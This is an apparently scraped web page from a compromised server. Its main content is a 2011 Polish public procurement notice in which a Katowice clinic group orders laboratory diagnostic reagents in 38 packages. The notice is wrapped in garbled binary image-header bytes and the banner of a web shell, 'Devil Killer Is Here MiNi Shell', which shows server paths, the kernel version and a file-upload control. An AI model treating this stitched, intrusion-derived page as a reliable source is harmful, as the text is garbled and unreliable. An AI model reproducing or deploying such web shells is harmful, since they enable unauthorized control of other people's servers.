JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110228/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110228/67681-N-2011.html

<p class="kh_header"><b>Katowice: Sukcesywna dostawa odczynników do diagnostyki laboratoryjnej</b><br>
<b>Numer ogłoszenia: 67681 - 2011; data zamieszczenia: 28.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Wojewódzkich Przychodni Specjalistycznych , ul. Powstańców 31, 40-038 Katowice, woj. śląskie, tel. 32 2090885, faks 32 2553242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwps.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa odczynników do diagnostyki laboratoryjnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników do diagnostyki laboratoryjnej dla Zespołu Wojewódzkich Przychodni Specjalistycznych w Katowicach. Przedmiot zamówienia będzie realizowany w 38 częściach:
Pakiet nr 1 - Analityka ogólna - hematologia i cytologia wyszczególniona w załączniku nr 2.1 do SIWZ;
Pakiet nr 2 - Barwniki do hematologii i mikrobiologii wyszczególnione w załączniku nr 2.2 do SIWZ;
Pakiet nr 3 - Diagnostyka moczu do aparatu MIDITRON JUNIOR firmy ROCHE wyszczególniona w załączniku nr 2.3 do SIWZ;
Pakiet nr 4 - Krążki do wykrywania ESBL MBL wyszczególnione w załączniku nr 2.4 do SIWZ;
Pakiet nr 5 - Diagnostyka grzybów wyszczególniona w załączniku nr 2.5 do SIWZ;
Pakiet nr 6 - Mikrobiologia wyszczególniona w załączniku nr 2.6 do SIWZ;
Pakiet nr 7 - Podłoża mikrobiologiczne III (sypkie) wyszczególnione w załączniku nr 2.7 do SIWZ;
Pakiet nr 8 - Diagnostyka Chlamydia Trachomatis wyszczególniona w załączniku nr 2.8 do SIWZ
Pakiet nr 9 - Diagnostyka zakażeń wywołanych przez Borrelia burgdorferi. Metoda: immunofluoroscencja pośrednia wyszczególniona w załączniku nr 2.9 do SIWZ;
Pakiet nr 10 - Diagnostyka kału wyszczególniona w załączniku nr 2.10 do SIWZ;
Pakiet nr 11 - Mikrobiologia - krążki do badania lekowrażliwości wyszczególnione w załączniku nr 2.11 do SIWZ;
Pakiet nr 12 - Koagulologia - do aparatu COAG CHROM 3003 wyszczególniona w załączniku nr 2.12 do SIWZ;
Pakiet nr 13 - Diagnostyka RZS wyszczególniona w załączniku nr 2.13 do SIWZ;
Pakiet nr 14 - Diagnostyka chorób z autoagresji wyszczególniona w załączniku nr 2.14 do SIWZ;
Pakiet nr 15 - Diagnostyka HIV wyszczególniona w załączniku nr 2.15 do SIWZ;
Pakiet nr 16 - Mikrobiologia wyszczególniona w załączniku nr 2.16 do SIWZ;
Pakiet nr 17 - Testy z wykorzystaniem metod aglutynacji, precypitacji, hemaglutynacji wyszczególnione w załączniku nr 2.17 do SIWZ;
Pakiet nr 18 - Diagnostyka narkotyków w moczu wyszczególniona w załączniku nr 2.18 do SIWZ;
Pakiet nr 19 - Diagnostyka Helicobacter pyroli wyszczególniona w załączniku nr 2.19 do SIWZ;
Pakiet nr 20 - Mikrobiologia - krążki diagnostyczne wyszczególnione w załączniku nr 2.20 do SIWZ;
Pakiet nr 21 - Testy do szybkiej identyfikacji bakterii ( metoda Aglutynacyjna) wyszczególnione w załączniku nr 2.21 do SIWZ;
Pakiet nr 22 - Podłoża mikrobiologiczne gotowe - na płytkach Petriego wyszczególnione w załączniku nr 2.22 do SIWZ;
Pakiet nr 23 - Testy identyfikacyjne na podstawie cech biochemicznych wyszczególnione w załączniku nr 2.23 do SIWZ;
Pakiet nr 24 - Substraty do podłoża Stonenbrika wyszczególnione w załączniku nr 2.24 do SIWZ;
Pakiet nr 25 - Szczepy wzorcowe wyszczególnione w załączniku nr 2.25 do SIWZ;
Pakiet nr 26 - Diagnostyka genetyczna wyszczególniona w załączniku nr 2.26 do SIWZ;
Pakiet nr 27 - Morfologia krwi obwodowej na urządzeniu MICROS OTB 60 (HORIBA) wyszczególniona w załączniku nr 2.27 do SIWZ;
Pakiet nr 28 - Diagnostyka gruźlicy do aparatu MB/BACT 120 (BioMerieux) wyszczególniona w załączniku nr 2.28 do SIWZ;
Pakiet nr 29 - Diagnostyka narkotyków w moczu wyszczególniona w załączniku nr 2.29 do SIWZ;
Pakiet nr 30 - Diagnostyka moczu - paski wyszczególnione w załączniku nr 2.30 do SIWZ;
Pakiet nr 31 - Oznaczanie glukozy - paski wyszczególnione w załączniku nr 2.31 do SIWZ;
Pakiet nr 32 - Paski fluoresceinowe wyszczególnione w załączniku nr 2.32 do SIWZ;
Pakiet nr 33 - Parafina histologiczna wyszczególniona w załączniku nr 2.33 do SIWZ;
Pakiet nr 34 - Formaldehyd wyszczególniony w załączniku nr 2.34 do SIWZ;
Pakiet nr 35 - Wosk biały wyszczególniony w załączniku nr 2.35 do SIWZ;
Pakiet nr 36 - Analityka ogólna - hematologia i cytologia wyszczególniona w załączniku nr 2.36 do SIWZ;
Pakiet nr 37 - Bakteriologia manualna wyszczególniona w załączniku nr 2.37 do SIWZ;
Pakiet nr 38 - Diagnostyka zakażeń prątkiem gruźlicy wyszczególniona w załączniku nr 2.38 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 38.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o złożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o złożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o złożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o złożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o złożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz oferty stanowiący załącznik nr 1 do SIWZ;
2. Wypełnione i podpisane załączniki 2.1÷2.38 do SIWZ, którymi są Formularze asortymentowo- cenowe w zakresie Pakietów, na które Wykonawca składa ofertę;
3. Podpisane oświadczenie ( za wyjątkiem Pakietów nr 8, 24, 34, 36 ), że oferowany przedmiot zamówienia dostarczany przez Wykonawcę jest dopuszczony do obrotu i stosowania w placówkach ochrony zdrowia na terenie Rzeczpospolitej Polskiej, zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679). stanowiące załącznik nr 5 do SIWZ;
4. Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru;
5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp Zamawiający zastrzega sobie możliwość zmiany zawartej umowy w następujących przypadkach:
1. w kwestii dotyczącej przedmiotu umowy (Załącznik nr 1 do umowy) w przypadku, gdy konkretny przedmiot zamówienia ( odczynnik ) zostanie wycofany  z produkcji lub z obrotu handlowego na terenie kraju - co Wykonawca zobowiązany jest udokumentować. Wykonawca za zgodą Zamawiającego może dostarczyć przedmiot zamówienia ( odczynnik  ) o tożsamych parametrach, w takiej samej cenie.
2. w kwestii dotyczącej zmiany urzędowej stawki podatku VAT, przy czym zmianie ulegnie  wyłącznie  cena brutto, cena netto pozostanie bez zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Wojewódzkich Przychodni Specjalistycznych w Katowicach, ul. Powstańców 31, 40-038 Katowice, pok. 332.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2011 godzina 09:00, miejsce: Zespół Wojewódzkich Przychodni Specjalistycznych w Katowicach, ul. Powstańców 31, 40-038 Katowice, pok. 323.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Analityka ogólna - hematologia i cytologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1 - Analityka ogólna - hematologia i cytologia wyszczególniona w załączniku nr 2.1 do SIWZ:
1. Płyn do liczenia Trombocytów - zamawiana ilość - 200 ml, wymagana wielkość op. - 100 ml
2. Odczynnik MacWiliama do jakościowego wykrywania białka w moczu - zamawiana ilość - 3 000 ml, wymagana wielkość op. 	500 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET nr 2 - Barwniki do hematologii i mikrobiologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 2 - Barwniki do hematologii i mikrobiologii wyszczególnione w załączniku nr 2.2 do SIWZ: 
1. Odbarwiacz (Aceton + Alkohol ) do barwienia  MET GRAMA - zamawiana ilość - 3 000 ml, wymagana wielkość op. - 1000 ml.
2. Zmodyfikowana FUKSYNA KARBOLOWA  - do barwienia na zimno - zamawiana ilość - 10 000 ml, wymagana wielkość op. - 1000 ml.
3. 1% r-r  błękitu metylowego	 - zamawiana ilość - 4 000 ml, wymagana wielkość op. - 1000 ml.
4. Barwnik May Grunwald - zamawiana ilość - 12 000 ml, wymagana wielkość op. - 500 ml.
5. Barwnik GIEMZY - zamawiana ilość - 6 000 ml, wymagana wielkość op. - 500 ml.
6. Odczynnik  LUGOLA do barwienia METODĄ GRAMA - zamawiana ilość - 3 000 ml,	wymagana wielkość op. - 1000 ml.
7. Fiolet do barwienia MET GRAMA - zamawiana ilość - 3 000 ml, wymagana wielkość op. -	1000 ml.
8. Fuksyna do barwienia  MET. GRAMA - zamawiana ilość - 3 000 ml, wymagana wielkość op. - 1000 ml.
9. SUDAN III r-r alkoholowy - zamawiana ilość - 100 ml, wymagana wielkość op. -	50 ml.
10. Odczynnik LUGOLA- do barwienia pasożytów w kale - zamawiana ilość - 100 ml, wymagana wielkość op. - 100 ml.
11. Odczynnik SCHIFFA	- zamawiana ilość - 14 000 ml	, wymagana wielkość op. - 100 ml.
Uwagi:                                                                                                                                                                          1. Odczynnik Giemzy i May Grunwalda - trwałość rozcieńczonych odczynników co najmniej 2 godziny.
2.Jeśli instrukcja zakłada użycie odczynnika rozcieńczającego Wykonawca dostarcza go w zestawie z barwnikiem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET nr 3 - Diagnostyka moczu do aparatu MIDITRON JUNIOR firmy ROCHE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 3 - Diagnostyka moczu do aparatu MIDITRON JUNIOR firmy ROCHE wyszczególniona w załączniku nr 2.3 do SIWZ:
1. Paski 10 - parametrowe - zamawiana ilość - 12 000 ozn.	wymagana wielkość op. - 100 pasków.
2. Paski kalibrujące do w/w aparatu	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
3. Mocz kontrolny -wartości podwyższone - zamawiana ilość - 1 op. wymagana wielkość op. - 12 x 12 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET nr 4 - Krążki do wykrywania ESBL MBL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 4 - Krążki do wykrywania ESBL MBL wyszczególnione w załączniku nr 2.4 do SIWZ:
1. CEFTAZYDYM + KWAS KLAWULANOWY - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
2. CEFOTAKSYM + KWAS KLAWULANOWY - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
3. CEFEPIM+ KWAS KLAWULANOWY	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
4. IMIPENEM + EDTA - zamawiana ilość -	50 szt. wymagana wielkość op. -50 szt.
5. MEROPENEM+ EDTA - - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET nr 5 - Diagnostyka grzybów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 5 - Diagnostyka grzybów wyszczególniona w załączniku nr 2.5 do SIWZ:
1. Zestawy do identyfikacji grzybów drożdżopodobnych - zamawiana ilość - 30 szt.
2. Zestawy do oznaczania lekowrażliwości grzybów  drożdżopodobnych na chemioterapeutyki - zamawiana ilość - 50 szt.
UWAGI:                                                                                                                                                         1. Zestaw do identyfikacji - różnicowanie za pomocą różnych cech biochemicznych / asymilacja cukrów oraz inne cechy/ w opakowaniach nie więcej niż 10 oznaczeń. 
2. Pozycja 1 i 2 - jeden producent..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET nr 6 - Mikrobiologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 6 - Mikrobiologia wyszczególniona w załączniku nr 2.6 do SIWZ:
1. Plazma królicza - zamawiana ilość - 20 ml, wymagana wielkość op. - 10 ml.
UWAGI:                                                                                                                     
20 ml po rozpuszczeniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET nr 7 - Podłoża mikrobiologiczne III (sypkie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 7 - Podłoża mikrobiologiczne III (sypkie) wyszczególnione w załączniku nr 2.7 do SIWZ:
1. Podłoże CHAPMANA - zamawiana ilość - 2 000 g, wymagana wielkość op. - 500 g.
2. Podłoże MAC CONKEYA - zamawiana ilość - 1000 g, wymagana wielkość op. - 500 g.
3. Podłoże MILLER HINTONA - zamawiana ilość - 500 g, wymagana wielkość op. - 	500g,
4. Podłoże wybiórcze dla ENTEROKOKÓW	- zamawiana ilość - 500 g, wymagana wielkość op. - 500 g.
5. Sabouroud agar z  CHLORAMFENIKOLEM - zamawiana ilość - 1 500 g, wymagana wielkość op. - 500 g..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET nr 8 - Diagnostyka Chlamydia Trachomatis.</p>
